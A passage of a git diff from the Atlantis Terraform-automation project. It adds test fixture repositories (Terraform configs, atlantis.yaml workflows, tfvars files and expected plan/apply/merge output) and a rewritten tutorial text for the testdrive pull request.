+ id:
+Plan: 1 to add, 0 to change, 0 to destroy.
+
+```
+
+* To **discard** this plan click [here](lock-url).
+
diff --git a/server/testfixtures/test-repos/modules/exp-output-merge-all-dirs.txt b/server/testfixtures/test-repos/modules/exp-output-merge-all-dirs.txt
new file mode 100644
index 0000000000..9c553b9717
--- /dev/null
+++ b/server/testfixtures/test-repos/modules/exp-output-merge-all-dirs.txt
@@ -0,0 +1,4 @@
+Locks and plans deleted for the projects and workspaces modified in this pull request:
+
+- dir: `production` workspace: `default`
+- dir: `staging` workspace: `default`
\ No newline at end of file
diff --git a/server/testfixtures/test-repos/modules/exp-output-merge-only-staging.txt b/server/testfixtures/test-repos/modules/exp-output-merge-only-staging.txt
new file mode 100644
index 0000000000..95dde446ff
--- /dev/null
+++ b/server/testfixtures/test-repos/modules/exp-output-merge-only-staging.txt
@@ -0,0 +1,3 @@
+Locks and plans deleted for the projects and workspaces modified in this pull request:
+
+- dir: `staging` workspace: `default`
\ No newline at end of file
diff --git a/server/testfixtures/test-repos/modules/exp-output-merge.txt b/server/testfixtures/test-repos/modules/exp-output-merge.txt
new file mode 100644
index 0000000000..9080217904
--- /dev/null
+++ b/server/testfixtures/test-repos/modules/exp-output-merge.txt
@@ -0,0 +1,4 @@
+Locks and plans deleted for the projects and workspaces modified in this pull request:
+
+- dir: `staging` workspace: `default`
+- dir: `.` workspace: `default`
diff --git a/server/testfixtures/test-repos/modules/exp-output-plan-production.txt b/server/testfixtures/test-repos/modules/exp-output-plan-production.txt
new file mode 100644
index 0000000000..caea5e6434
--- /dev/null
+++ b/server/testfixtures/test-repos/modules/exp-output-plan-production.txt
@@ -0,0 +1,23 @@
+Ran Plan in dir: `production` workspace: `default`
+```diff
+Refreshing Terraform state in-memory prior to plan...
+The refreshed state will be used to calculate this plan, but will not be
+persisted to local or remote state storage.
+
+
+------------------------------------------------------------------------
+
+An execution plan has been generated and is shown below.
+Resource actions are indicated with the following symbols:
+ + create
+
+Terraform will perform the following actions:
+
++ module.null.null_resource.this
+ id:
+Plan: 1 to add, 0 to change, 0 to destroy.
+
+```
+
+* To **discard** this plan click [here](lock-url).
+
diff --git a/server/testfixtures/test-repos/modules/exp-output-plan-staging.txt b/server/testfixtures/test-repos/modules/exp-output-plan-staging.txt
new file mode 100644
index 0000000000..0e77a94421
--- /dev/null
+++ b/server/testfixtures/test-repos/modules/exp-output-plan-staging.txt
@@ -0,0 +1,23 @@
+Ran Plan in dir: `staging` workspace: `default`
+```diff
+Refreshing Terraform state in-memory prior to plan...
+The refreshed state will be used to calculate this plan, but will not be
+persisted to local or remote state storage.
+
+
+------------------------------------------------------------------------
+
+An execution plan has been generated and is shown below.
+Resource actions are indicated with the following symbols:
+ + create
+
+Terraform will perform the following actions:
+
++ module.null.null_resource.this
+ id:
+Plan: 1 to add, 0 to change, 0 to destroy.
+
+```
+
+* To **discard** this plan click [here](lock-url).
+
diff --git a/server/testfixtures/test-repos/modules/modules/null/main.tf b/server/testfixtures/test-repos/modules/modules/null/main.tf
new file mode 100644
index 0000000000..14f6a189c1
--- /dev/null
+++ b/server/testfixtures/test-repos/modules/modules/null/main.tf
@@ -0,0 +1,10 @@
+variable "var" {}
+resource "null_resource" "this" {
+}
+output "var" {
+ value = "${var.var}"
+}
+
+output "workspace" {
+ value = "${terraform.workspace}"
+}
diff --git a/server/testfixtures/test-repos/modules/production/main.tf b/server/testfixtures/test-repos/modules/production/main.tf
new file mode 100644
index 0000000000..94a103ffba
--- /dev/null
+++ b/server/testfixtures/test-repos/modules/production/main.tf
@@ -0,0 +1,7 @@
+module "null" {
+ source = "../modules/null"
+ var = "production"
+}
+output "var" {
+ value = "${module.null.var}"
+}
\ No newline at end of file
diff --git a/server/testfixtures/test-repos/modules/staging/main.tf b/server/testfixtures/test-repos/modules/staging/main.tf
new file mode 100644
index 0000000000..15fa81303a
--- /dev/null
+++ b/server/testfixtures/test-repos/modules/staging/main.tf
@@ -0,0 +1,7 @@
+module "null" {
+ source = "../modules/null"
+ var = "staging"
+}
+output "var" {
+ value = "${module.null.var}"
+}
\ No newline at end of file
diff --git a/server/testfixtures/test-repos/simple-yaml/atlantis.yaml b/server/testfixtures/test-repos/simple-yaml/atlantis.yaml
new file mode 100644
index 0000000000..62e6047617
--- /dev/null
+++ b/server/testfixtures/test-repos/simple-yaml/atlantis.yaml
@@ -0,0 +1,24 @@
+version: 2
+projects:
+- dir: .
+ workspace: default
+ workflow: default
+- dir: .
+ workspace: staging
+ workflow: staging
+workflows:
+ default:
+ # Only specify plan so should use default apply workflow.
+ plan:
+ steps:
+ - init
+ - plan:
+ extra_args: [-var, var=fromconfig]
+ staging:
+ plan:
+ steps:
+ - init
+ - plan:
+ extra_args: [-var-file, staging.tfvars]
+ apply:
+ steps: [apply]
diff --git a/server/testfixtures/test-repos/simple-yaml/exp-output-apply-default.txt b/server/testfixtures/test-repos/simple-yaml/exp-output-apply-default.txt
new file mode 100644
index 0000000000..93654c7deb
--- /dev/null
+++ b/server/testfixtures/test-repos/simple-yaml/exp-output-apply-default.txt
@@ -0,0 +1,14 @@
+Ran Apply in dir: `.` workspace: `default`
+```diff
+null_resource.simple: Creating...
+null_resource.simple: Creation complete after *s (ID: ******************)
+
+Apply complete! Resources: 1 added, 0 changed, 0 destroyed.
+
+Outputs:
+
+var = fromconfig
+workspace = default
+
+```
+
diff --git a/server/testfixtures/test-repos/simple-yaml/exp-output-apply-staging.txt b/server/testfixtures/test-repos/simple-yaml/exp-output-apply-staging.txt
new file mode 100644
index 0000000000..6aed57ab53
--- /dev/null
+++ b/server/testfixtures/test-repos/simple-yaml/exp-output-apply-staging.txt
@@ -0,0 +1,14 @@
+Ran Apply in dir: `.` workspace: `staging`
+```diff
+null_resource.simple: Creating...
+null_resource.simple: Creation complete after *s (ID: ******************)
+
+Apply complete! Resources: 1 added, 0 changed, 0 destroyed.
+
+Outputs:
+
+var = fromfile
+workspace = staging
+
+```
+
diff --git a/server/testfixtures/test-repos/simple-yaml/exp-output-autoplan.txt b/server/testfixtures/test-repos/simple-yaml/exp-output-autoplan.txt
new file mode 100644
index 0000000000..b539452a7f
--- /dev/null
+++ b/server/testfixtures/test-repos/simple-yaml/exp-output-autoplan.txt
@@ -0,0 +1,51 @@
+Ran Plan for 2 projects:
+1. workspace: `default` dir: `.`
+1. workspace: `staging` dir: `.`
+
+### 1. workspace: `default` dir: `.`
+```diff
+Refreshing Terraform state in-memory prior to plan...
+The refreshed state will be used to calculate this plan, but will not be
+persisted to local or remote state storage.
+
+
+------------------------------------------------------------------------
+
+An execution plan has been generated and is shown below.
+Resource actions are indicated with the following symbols:
+ + create
+
+Terraform will perform the following actions:
+
++ null_resource.simple
+ id:
+Plan: 1 to add, 0 to change, 0 to destroy.
+
+```
+
+* To **discard** this plan click [here](lock-url).
+---
+### 2. workspace: `staging` dir: `.`
+```diff
+Refreshing Terraform state in-memory prior to plan...
+The refreshed state will be used to calculate this plan, but will not be
+persisted to local or remote state storage.
+
+
+------------------------------------------------------------------------
+
+An execution plan has been generated and is shown below.
+Resource actions are indicated with the following symbols:
+ + create
+
+Terraform will perform the following actions:
+
++ null_resource.simple
+ id:
+Plan: 1 to add, 0 to change, 0 to destroy.
+
+```
+
+* To **discard** this plan click [here](lock-url).
+---
+
diff --git a/server/testfixtures/test-repos/simple-yaml/exp-output-merge.txt b/server/testfixtures/test-repos/simple-yaml/exp-output-merge.txt
new file mode 100644
index 0000000000..9ac6047224
--- /dev/null
+++ b/server/testfixtures/test-repos/simple-yaml/exp-output-merge.txt
@@ -0,0 +1,3 @@
+Locks and plans deleted for the projects and workspaces modified in this pull request:
+
+- dir: `.` workspaces: `default`, `staging`
\ No newline at end of file
diff --git a/server/testfixtures/test-repos/simple-yaml/main.tf b/server/testfixtures/test-repos/simple-yaml/main.tf
new file mode 100644
index 0000000000..39f891a7b0
--- /dev/null
+++ b/server/testfixtures/test-repos/simple-yaml/main.tf
@@ -0,0 +1,15 @@
+resource "null_resource" "simple" {
+ count = "1"
+}
+
+variable "var" {
+ default = "default"
+}
+
+output "var" {
+ value = "${var.var}"
+}
+
+output "workspace" {
+ value = "${terraform.workspace}"
+}
\ No newline at end of file
diff --git a/server/testfixtures/test-repos/simple-yaml/staging.tfvars b/server/testfixtures/test-repos/simple-yaml/staging.tfvars
new file mode 100644
index 0000000000..6cf6f711e1
--- /dev/null
+++ b/server/testfixtures/test-repos/simple-yaml/staging.tfvars
@@ -0,0 +1 @@
+var= "fromfile"
\ No newline at end of file
diff --git a/server/testfixtures/test-repos/simple/exp-output-apply-var-default-workspace.txt b/server/testfixtures/test-repos/simple/exp-output-apply-var-default-workspace.txt
new file mode 100644
index 0000000000..59398bd4e5
--- /dev/null
+++ b/server/testfixtures/test-repos/simple/exp-output-apply-var-default-workspace.txt
@@ -0,0 +1,14 @@
+Ran Apply in dir: `.` workspace: `default`
+```diff
+null_resource.simple: Creating...
+null_resource.simple: Creation complete after *s (ID: ******************)
+
+Apply complete! Resources: 1 added, 0 changed, 0 destroyed.
+
+Outputs:
+
+var = default_workspace
+workspace = default
+
+```
+
diff --git a/server/testfixtures/test-repos/simple/exp-output-apply-var-new-workspace.txt b/server/testfixtures/test-repos/simple/exp-output-apply-var-new-workspace.txt
new file mode 100644
index 0000000000..e167833832
--- /dev/null
+++ b/server/testfixtures/test-repos/simple/exp-output-apply-var-new-workspace.txt
@@ -0,0 +1,14 @@
+Ran Apply in dir: `.` workspace: `new_workspace`
+```diff
+null_resource.simple: Creating...
+null_resource.simple: Creation complete after *s (ID: ******************)
+
+Apply complete! Resources: 1 added, 0 changed, 0 destroyed.
+
+Outputs:
+
+var = new_workspace
+workspace = new_workspace
+
+```
+
diff --git a/server/testfixtures/test-repos/simple/exp-output-apply-var.txt b/server/testfixtures/test-repos/simple/exp-output-apply-var.txt
new file mode 100644
index 0000000000..bd2cd1207b
--- /dev/null
+++ b/server/testfixtures/test-repos/simple/exp-output-apply-var.txt
@@ -0,0 +1,14 @@
+Ran Apply in dir: `.` workspace: `default`
+```diff
+null_resource.simple: Creating...
+null_resource.simple: Creation complete after *s (ID: ******************)
+
+Apply complete! Resources: 1 added, 0 changed, 0 destroyed.
+
+Outputs:
+
+var = overridden
+workspace = default
+
+```
+
diff --git a/server/testfixtures/test-repos/simple/exp-output-apply.txt b/server/testfixtures/test-repos/simple/exp-output-apply.txt
new file mode 100644
index 0000000000..ea31933908
--- /dev/null
+++ b/server/testfixtures/test-repos/simple/exp-output-apply.txt
@@ -0,0 +1,14 @@
+Ran Apply in dir: `.` workspace: `default`
+```diff
+null_resource.simple: Creating...
+null_resource.simple: Creation complete after *s (ID: ******************)
+
+Apply complete! Resources: 1 added, 0 changed, 0 destroyed.
+
+Outputs:
+
+var = default
+workspace = default
+
+```
+
diff --git a/server/testfixtures/test-repos/simple/exp-output-atlantis-plan-new-workspace.txt b/server/testfixtures/test-repos/simple/exp-output-atlantis-plan-new-workspace.txt
new file mode 100644
index 0000000000..2aea0c8cb6
--- /dev/null
+++ b/server/testfixtures/test-repos/simple/exp-output-atlantis-plan-new-workspace.txt
@@ -0,0 +1,23 @@
+Ran Plan in dir: `.` workspace: `new_workspace`
+```diff
+Refreshing Terraform state in-memory prior to plan...
+The refreshed state will be used to calculate this plan, but will not be
+persisted to local or remote state storage.
+
+
+------------------------------------------------------------------------
+
+An execution plan has been generated and is shown below.
+Resource actions are indicated with the following symbols:
+ + create
+
+Terraform will perform the following actions:
+
++ null_resource.simple
+ id:
+Plan: 1 to add, 0 to change, 0 to destroy.
+
+```
+
+* To **discard** this plan click [here](lock-url).
+
diff --git a/server/testfixtures/test-repos/simple/exp-output-atlantis-plan-var-default-workspace.txt b/server/testfixtures/test-repos/simple/exp-output-atlantis-plan-var-default-workspace.txt
new file mode 100644
index 0000000000..15a712c428
--- /dev/null
+++ b/server/testfixtures/test-repos/simple/exp-output-atlantis-plan-var-default-workspace.txt
@@ -0,0 +1,23 @@
+Ran Plan in dir: `.` workspace: `default`
+```diff
+Refreshing Terraform state in-memory prior to plan...
+The refreshed state will be used to calculate this plan, but will not be
+persisted to local or remote state storage.
+
+
+------------------------------------------------------------------------
+
+An execution plan has been generated and is shown below.
+Resource actions are indicated with the following symbols:
+ + create
+
+Terraform will perform the following actions:
+
++ null_resource.simple
+ id:
+Plan: 1 to add, 0 to change, 0 to destroy.
+
+```
+
+* To **discard** this plan click [here](lock-url).
+
diff --git a/server/testfixtures/test-repos/simple/exp-output-atlantis-plan.txt b/server/testfixtures/test-repos/simple/exp-output-atlantis-plan.txt
new file mode 100644
index 0000000000..15a712c428
--- /dev/null
+++ b/server/testfixtures/test-repos/simple/exp-output-atlantis-plan.txt
@@ -0,0 +1,23 @@
+Ran Plan in dir: `.` workspace: `default`
+```diff
+Refreshing Terraform state in-memory prior to plan...
+The refreshed state will be used to calculate this plan, but will not be
+persisted to local or remote state storage.
+
+
+------------------------------------------------------------------------
+
+An execution plan has been generated and is shown below.
+Resource actions are indicated with the following symbols:
+ + create
+
+Terraform will perform the following actions:
+
++ null_resource.simple
+ id:
+Plan: 1 to add, 0 to change, 0 to destroy.
+
+```
+
+* To **discard** this plan click [here](lock-url).
+
diff --git a/server/testfixtures/test-repos/simple/exp-output-autoplan.txt b/server/testfixtures/test-repos/simple/exp-output-autoplan.txt
new file mode 100644
index 0000000000..15a712c428
--- /dev/null
+++ b/server/testfixtures/test-repos/simple/exp-output-autoplan.txt
@@ -0,0 +1,23 @@
+Ran Plan in dir: `.` workspace: `default`
+```diff
+Refreshing Terraform state in-memory prior to plan...
+The refreshed state will be used to calculate this plan, but will not be
+persisted to local or remote state storage.
+
+
+------------------------------------------------------------------------
+
+An execution plan has been generated and is shown below.
+Resource actions are indicated with the following symbols:
+ + create
+
+Terraform will perform the following actions:
+
++ null_resource.simple
+ id:
+Plan: 1 to add, 0 to change, 0 to destroy.
+
+```
+
+* To **discard** this plan click [here](lock-url).
+
diff --git a/server/testfixtures/test-repos/simple/exp-output-merge-workspaces.txt b/server/testfixtures/test-repos/simple/exp-output-merge-workspaces.txt
new file mode 100644
index 0000000000..dad5ee4ab8
--- /dev/null
+++ b/server/testfixtures/test-repos/simple/exp-output-merge-workspaces.txt
@@ -0,0 +1,3 @@
+Locks and plans deleted for the projects and workspaces modified in this pull request:
+
+- dir: `.` workspaces: `default`, `new_workspace`
\ No newline at end of file
diff --git a/server/testfixtures/test-repos/simple/exp-output-merge.txt b/server/testfixtures/test-repos/simple/exp-output-merge.txt
new file mode 100644
index 0000000000..70df2f2518
--- /dev/null
+++ b/server/testfixtures/test-repos/simple/exp-output-merge.txt
@@ -0,0 +1,3 @@
+Locks and plans deleted for the projects and workspaces modified in this pull request:
+
+- dir: `.` workspace: `default`
\ No newline at end of file
diff --git a/server/testfixtures/test-repos/simple/main.tf b/server/testfixtures/test-repos/simple/main.tf
new file mode 100644
index 0000000000..588b3db4df
--- /dev/null
+++ b/server/testfixtures/test-repos/simple/main.tf
@@ -0,0 +1,15 @@
+resource "null_resource" "simple" {
+ count = 1
+}
+
+variable "var" {
+ default = "default"
+}
+
+output "var" {
+ value = "${var.var}"
+}
+
+output "workspace" {
+ value = "${terraform.workspace}"
+}
\ No newline at end of file
diff --git a/server/testfixtures/test-repos/tfvars-yaml-no-autoplan/atlantis.yaml b/server/testfixtures/test-repos/tfvars-yaml-no-autoplan/atlantis.yaml
new file mode 100644
index 0000000000..8dbfe353ec
--- /dev/null
+++ b/server/testfixtures/test-repos/tfvars-yaml-no-autoplan/atlantis.yaml
@@ -0,0 +1,29 @@
+version: 2
+projects:
+- dir: .
+ name: default
+ workflow: default
+ autoplan:
+ enabled: false
+- dir: .
+ workflow: staging
+ name: staging
+ autoplan:
+ enabled: false
+workflows:
+ default:
+ plan:
+ steps:
+ - run: rm -rf .terraform
+ - init:
+ extra_args: [-backend-config=default.backend.tfvars]
+ - plan:
+ extra_args: [-var-file=default.tfvars]
+ staging:
+ plan:
+ steps:
+ - run: rm -rf .terraform
+ - init:
+ extra_args: [-backend-config=staging.backend.tfvars]
+ - plan:
+ extra_args: [-var-file, staging.tfvars]
diff --git a/server/testfixtures/test-repos/tfvars-yaml-no-autoplan/default.backend.tfvars b/server/testfixtures/test-repos/tfvars-yaml-no-autoplan/default.backend.tfvars
new file mode 100644
index 0000000000..a03acf6e2d
--- /dev/null
+++ b/server/testfixtures/test-repos/tfvars-yaml-no-autoplan/default.backend.tfvars
@@ -0,0 +1 @@
+path = "default.tfstate"
\ No newline at end of file
diff --git a/server/testfixtures/test-repos/tfvars-yaml-no-autoplan/default.tfvars b/server/testfixtures/test-repos/tfvars-yaml-no-autoplan/default.tfvars
new file mode 100644
index 0000000000..c5e157a5d5
--- /dev/null
+++ b/server/testfixtures/test-repos/tfvars-yaml-no-autoplan/default.tfvars
@@ -0,0 +1 @@
+var = "default"
\ No newline at end of file
diff --git a/server/testfixtures/test-repos/tfvars-yaml-no-autoplan/exp-output-apply-default.txt b/server/testfixtures/test-repos/tfvars-yaml-no-autoplan/exp-output-apply-default.txt
new file mode 100644
index 0000000000..9ccb1a95d6
--- /dev/null
+++ b/server/testfixtures/test-repos/tfvars-yaml-no-autoplan/exp-output-apply-default.txt
@@ -0,0 +1,21 @@
+Ran Apply in dir: `.` workspace: `default`
+```diff
+null_resource.simple: Creating...
+null_resource.simple: Creation complete after *s (ID: ******************)
+
+Apply complete! Resources: 1 added, 0 changed, 0 destroyed.
+
+The state of your infrastructure has been saved to the path
+below. This state is required to modify and destroy your
+infrastructure, so keep it safe. To inspect the complete state
+use the `terraform show` command.
+
+State path: default.tfstate
+
+Outputs:
+
+var = default
+workspace = default
+
+```
+
diff --git a/server/testfixtures/test-repos/tfvars-yaml-no-autoplan/exp-output-apply-staging.txt b/server/testfixtures/test-repos/tfvars-yaml-no-autoplan/exp-output-apply-staging.txt
new file mode 100644
index 0000000000..e0d34d0905
--- /dev/null
+++ b/server/testfixtures/test-repos/tfvars-yaml-no-autoplan/exp-output-apply-staging.txt
@@ -0,0 +1,21 @@
+Ran Apply in dir: `.` workspace: `default`
+```diff
+null_resource.simple: Creating...
+null_resource.simple: Creation complete after *s (ID: ******************)
+
+Apply complete! Resources: 1 added, 0 changed, 0 destroyed.
+
+The state of your infrastructure has been saved to the path
+below. This state is required to modify and destroy your
+infrastructure, so keep it safe. To inspect the complete state
+use the `terraform show` command.
+
+State path: staging.tfstate
+
+Outputs:
+
+var = staging
+workspace = default
+
+```
+
diff --git a/server/testfixtures/test-repos/tfvars-yaml-no-autoplan/exp-output-merge.txt b/server/testfixtures/test-repos/tfvars-yaml-no-autoplan/exp-output-merge.txt
new file mode 100644
index 0000000000..70df2f2518
--- /dev/null
+++ b/server/testfixtures/test-repos/tfvars-yaml-no-autoplan/exp-output-merge.txt
@@ -0,0 +1,3 @@
+Locks and plans deleted for the projects and workspaces modified in this pull request:
+
+- dir: `.` workspace: `default`
\ No newline at end of file
diff --git a/server/testfixtures/test-repos/tfvars-yaml-no-autoplan/exp-output-plan-default.txt b/server/testfixtures/test-repos/tfvars-yaml-no-autoplan/exp-output-plan-default.txt
new file mode 100644
index 0000000000..15a712c428
--- /dev/null
+++ b/server/testfixtures/test-repos/tfvars-yaml-no-autoplan/exp-output-plan-default.txt
@@ -0,0 +1,23 @@
+Ran Plan in dir: `.` workspace: `default`
+```diff
+Refreshing Terraform state in-memory prior to plan...
+The refreshed state will be used to calculate this plan, but will not be
+persisted to local or remote state storage.
+
+
+------------------------------------------------------------------------
+
+An execution plan has been generated and is shown below.
+Resource actions are indicated with the following symbols:
+ + create
+
+Terraform will perform the following actions:
+
++ null_resource.simple
+ id:
+Plan: 1 to add, 0 to change, 0 to destroy.
+
+```
+
+* To **discard** this plan click [here](lock-url).
+
diff --git a/server/testfixtures/test-repos/tfvars-yaml-no-autoplan/exp-output-plan-staging.txt b/server/testfixtures/test-repos/tfvars-yaml-no-autoplan/exp-output-plan-staging.txt
new file mode 100644
index 0000000000..15a712c428
--- /dev/null
+++ b/server/testfixtures/test-repos/tfvars-yaml-no-autoplan/exp-output-plan-staging.txt
@@ -0,0 +1,23 @@
+Ran Plan in dir: `.` workspace: `default`
+```diff
+Refreshing Terraform state in-memory prior to plan...
+The refreshed state will be used to calculate this plan, but will not be
+persisted to local or remote state storage.
+
+
+------------------------------------------------------------------------
+
+An execution plan has been generated and is shown below.
+Resource actions are indicated with the following symbols:
+ + create
+
+Terraform will perform the following actions:
+
++ null_resource.simple
+ id:
+Plan: 1 to add, 0 to change, 0 to destroy.
+
+```
+
+* To **discard** this plan click [here](lock-url).
+
diff --git a/server/testfixtures/test-repos/tfvars-yaml-no-autoplan/main.tf b/server/testfixtures/test-repos/tfvars-yaml-no-autoplan/main.tf
new file mode 100644
index 0000000000..d4d77ff4e7
--- /dev/null
+++ b/server/testfixtures/test-repos/tfvars-yaml-no-autoplan/main.tf
@@ -0,0 +1,19 @@
+terraform {
+ backend "local" {
+ }
+}
+
+resource "null_resource" "simple" {
+ count = 1
+}
+
+variable "var" {
+}
+
+output "var" {
+ value = "${var.var}"
+}
+
+output "workspace" {
+ value = "${terraform.workspace}"
+}
\ No newline at end of file
diff --git a/server/testfixtures/test-repos/tfvars-yaml-no-autoplan/staging.backend.tfvars b/server/testfixtures/test-repos/tfvars-yaml-no-autoplan/staging.backend.tfvars
new file mode 100644
index 0000000000..e8133a2b59
--- /dev/null
+++ b/server/testfixtures/test-repos/tfvars-yaml-no-autoplan/staging.backend.tfvars
@@ -0,0 +1 @@
+path = "staging.tfstate"
\ No newline at end of file
diff --git a/server/testfixtures/test-repos/tfvars-yaml-no-autoplan/staging.tfvars b/server/testfixtures/test-repos/tfvars-yaml-no-autoplan/staging.tfvars
new file mode 100644
index 0000000000..34f4bbb990
--- /dev/null
+++ b/server/testfixtures/test-repos/tfvars-yaml-no-autoplan/staging.tfvars
@@ -0,0 +1 @@
+var = "staging"
\ No newline at end of file
diff --git a/server/testfixtures/test-repos/tfvars-yaml/atlantis.yaml b/server/testfixtures/test-repos/tfvars-yaml/atlantis.yaml
new file mode 100644
index 0000000000..a6f517140b
--- /dev/null
+++ b/server/testfixtures/test-repos/tfvars-yaml/atlantis.yaml
@@ -0,0 +1,26 @@
+version: 2
+projects:
+- dir: .
+ name: default
+ workflow: default
+- dir: .
+ workflow: staging
+ name: staging
+workflows:
+ default:
+ plan:
+ steps:
+ - run: rm -rf .terraform
+ - init:
+ extra_args: [-backend-config=default.backend.tfvars]
+ - plan:
+ extra_args: [-var-file=default.tfvars]
+ - run: echo workspace=$WORKSPACE
+ staging:
+ plan:
+ steps:
+ - run: rm -rf .terraform
+ - init:
+ extra_args: [-backend-config=staging.backend.tfvars]
+ - plan:
+ extra_args: [-var-file, staging.tfvars]
diff --git a/server/testfixtures/test-repos/tfvars-yaml/default.backend.tfvars b/server/testfixtures/test-repos/tfvars-yaml/default.backend.tfvars
new file mode 100644
index 0000000000..a03acf6e2d
--- /dev/null
+++ b/server/testfixtures/test-repos/tfvars-yaml/default.backend.tfvars
@@ -0,0 +1 @@
+path = "default.tfstate"
\ No newline at end of file
diff --git a/server/testfixtures/test-repos/tfvars-yaml/default.tfvars b/server/testfixtures/test-repos/tfvars-yaml/default.tfvars
new file mode 100644
index 0000000000..c5e157a5d5
--- /dev/null
+++ b/server/testfixtures/test-repos/tfvars-yaml/default.tfvars
@@ -0,0 +1 @@
+var = "default"
\ No newline at end of file
diff --git a/server/testfixtures/test-repos/tfvars-yaml/exp-output-apply-default.txt b/server/testfixtures/test-repos/tfvars-yaml/exp-output-apply-default.txt
new file mode 100644
index 0000000000..9ccb1a95d6
--- /dev/null
+++ b/server/testfixtures/test-repos/tfvars-yaml/exp-output-apply-default.txt
@@ -0,0 +1,21 @@
+Ran Apply in dir: `.` workspace: `default`
+```diff
+null_resource.simple: Creating...
+null_resource.simple: Creation complete after *s (ID: ******************)
+
+Apply complete! Resources: 1 added, 0 changed, 0 destroyed.
+
+The state of your infrastructure has been saved to the path
+below. This state is required to modify and destroy your
+infrastructure, so keep it safe. To inspect the complete state
+use the `terraform show` command.
+
+State path: default.tfstate
+
+Outputs:
+
+var = default
+workspace = default
+
+```
+
diff --git a/server/testfixtures/test-repos/tfvars-yaml/exp-output-apply-staging.txt b/server/testfixtures/test-repos/tfvars-yaml/exp-output-apply-staging.txt
new file mode 100644
index 0000000000..e0d34d0905
--- /dev/null
+++ b/server/testfixtures/test-repos/tfvars-yaml/exp-output-apply-staging.txt
@@ -0,0 +1,21 @@
+Ran Apply in dir: `.` workspace: `default`
+```diff
+null_resource.simple: Creating...
+null_resource.simple: Creation complete after *s (ID: ******************)
+
+Apply complete! Resources: 1 added, 0 changed, 0 destroyed.
+
+The state of your infrastructure has been saved to the path
+below. This state is required to modify and destroy your
+infrastructure, so keep it safe. To inspect the complete state
+use the `terraform show` command.
+
+State path: staging.tfstate
+
+Outputs:
+
+var = staging
+workspace = default
+
+```
+
diff --git a/server/testfixtures/test-repos/tfvars-yaml/exp-output-autoplan.txt b/server/testfixtures/test-repos/tfvars-yaml/exp-output-autoplan.txt
new file mode 100644
index 0000000000..20a4e02fb2
--- /dev/null
+++ b/server/testfixtures/test-repos/tfvars-yaml/exp-output-autoplan.txt
@@ -0,0 +1,53 @@
+Ran Plan for 2 projects:
+1. workspace: `default` dir: `.`
+1. workspace: `default` dir: `.`
+
+### 1. workspace: `default` dir: `.`
+```diff
+Refreshing Terraform state in-memory prior to plan...
+The refreshed state will be used to calculate this plan, but will not be
+persisted to local or remote state storage.
+
+
+------------------------------------------------------------------------
+
+An execution plan has been generated and is shown below.
+Resource actions are indicated with the following symbols:
+ + create
+
+Terraform will perform the following actions:
+
++ null_resource.simple
+ id:
+Plan: 1 to add, 0 to change, 0 to destroy.
+
+workspace=default
+
+```
+
+* To **discard** this plan click [here](lock-url).
+---
+### 2. workspace: `default` dir: `.`
+```diff
+Refreshing Terraform state in-memory prior to plan...
+The refreshed state will be used to calculate this plan, but will not be
+persisted to local or remote state storage.
+
+
+------------------------------------------------------------------------
+
+An execution plan has been generated and is shown below.
+Resource actions are indicated with the following symbols:
+ + create
+
+Terraform will perform the following actions:
+
++ null_resource.simple
+ id:
+Plan: 1 to add, 0 to change, 0 to destroy.
+
+```
+
+* To **discard** this plan click [here](lock-url).
+---
+
diff --git a/server/testfixtures/test-repos/tfvars-yaml/exp-output-merge.txt b/server/testfixtures/test-repos/tfvars-yaml/exp-output-merge.txt
new file mode 100644
index 0000000000..70df2f2518
--- /dev/null
+++ b/server/testfixtures/test-repos/tfvars-yaml/exp-output-merge.txt
@@ -0,0 +1,3 @@
+Locks and plans deleted for the projects and workspaces modified in this pull request:
+
+- dir: `.` workspace: `default`
\ No newline at end of file
diff --git a/server/testfixtures/test-repos/tfvars-yaml/main.tf b/server/testfixtures/test-repos/tfvars-yaml/main.tf
new file mode 100644
index 0000000000..d4d77ff4e7
--- /dev/null
+++ b/server/testfixtures/test-repos/tfvars-yaml/main.tf
@@ -0,0 +1,19 @@
+terraform {
+ backend "local" {
+ }
+}
+
+resource "null_resource" "simple" {
+ count = 1
+}
+
+variable "var" {
+}
+
+output "var" {
+ value = "${var.var}"
+}
+
+output "workspace" {
+ value = "${terraform.workspace}"
+}
\ No newline at end of file
diff --git a/server/testfixtures/test-repos/tfvars-yaml/staging.backend.tfvars b/server/testfixtures/test-repos/tfvars-yaml/staging.backend.tfvars
new file mode 100644
index 0000000000..e8133a2b59
--- /dev/null
+++ b/server/testfixtures/test-repos/tfvars-yaml/staging.backend.tfvars
@@ -0,0 +1 @@
+path = "staging.tfstate"
\ No newline at end of file
diff --git a/server/testfixtures/test-repos/tfvars-yaml/staging.tfvars b/server/testfixtures/test-repos/tfvars-yaml/staging.tfvars
new file mode 100644
index 0000000000..34f4bbb990
--- /dev/null
+++ b/server/testfixtures/test-repos/tfvars-yaml/staging.tfvars
@@ -0,0 +1 @@
+var = "staging"
\ No newline at end of file
diff --git a/testdrive/testdrive.go b/testdrive/testdrive.go
index 368eb8db2a..a0de2c65d6 100644
--- a/testdrive/testdrive.go
+++ b/testdrive/testdrive.go
@@ -47,11 +47,40 @@ This mode sets up Atlantis on a test repo so you can try it out. We will
[bold]Press Ctrl-c at any time to exit
`
-var pullRequestBody = "In this pull request we will learn how to use atlantis. There are various commands that are available to you:\n" +
- "* Start by typing `atlantis help` in the comments.\n" +
- "* Next, lets plan by typing `atlantis plan` in the comments. That will run a `terraform plan`.\n" +
- "* Now lets apply that plan. Type `atlantis apply` in the comments. This will run a `terraform apply`.\n" +
- "\nThank you for trying out atlantis. For more info on running atlantis in production see https://github.com/runatlantis/atlantis"
+var pullRequestBody = strings.Replace(`
+In this pull request we will learn how to use Atlantis.
+
+1. In a couple of seconds you should see the output of Atlantis automatically running $terraform plan$.
+
+1. You can manually run $plan$ by typing a comment:
+
+ $$$
+ atlantis plan
+ $$$
+ Usually you'll let Atlantis automatically run plan for you though.
+
+1. To see all the comment commands available, type:
+ $$$
+ atlantis help
+ $$$
+
+1. To see the help for a specific command, for example $atlantis plan$, type:
+ $$$
+ atlantis plan --help
+ $$$
+
+1. Atlantis holds a "Lock" on this directory to prevent other pull requests modifying
+ the Terraform state until this pull request is merged. To view the lock, go to the Atlantis UI: [http://localhost:4141](http://localhost:4141).
+ If you wanted, you could manually delete the plan and lock from the UI if you weren't ready to apply. Instead, we will apply it!
+
+1. To $terraform apply$ this change (which does nothing because it is creating a $null_resource$), type:
+ $$$
+ atlantis apply
+ $$$
+
+1. Finally, merge the pull request to unlock this directory.
+
+Thank you for trying out Atlantis! Next, try using Atlantis on your own repositories: [www.runatlantis.io/guide/getting-started.html](https://www.runatlantis.io/guide/getting-started.html).`, "$", "`", -1)
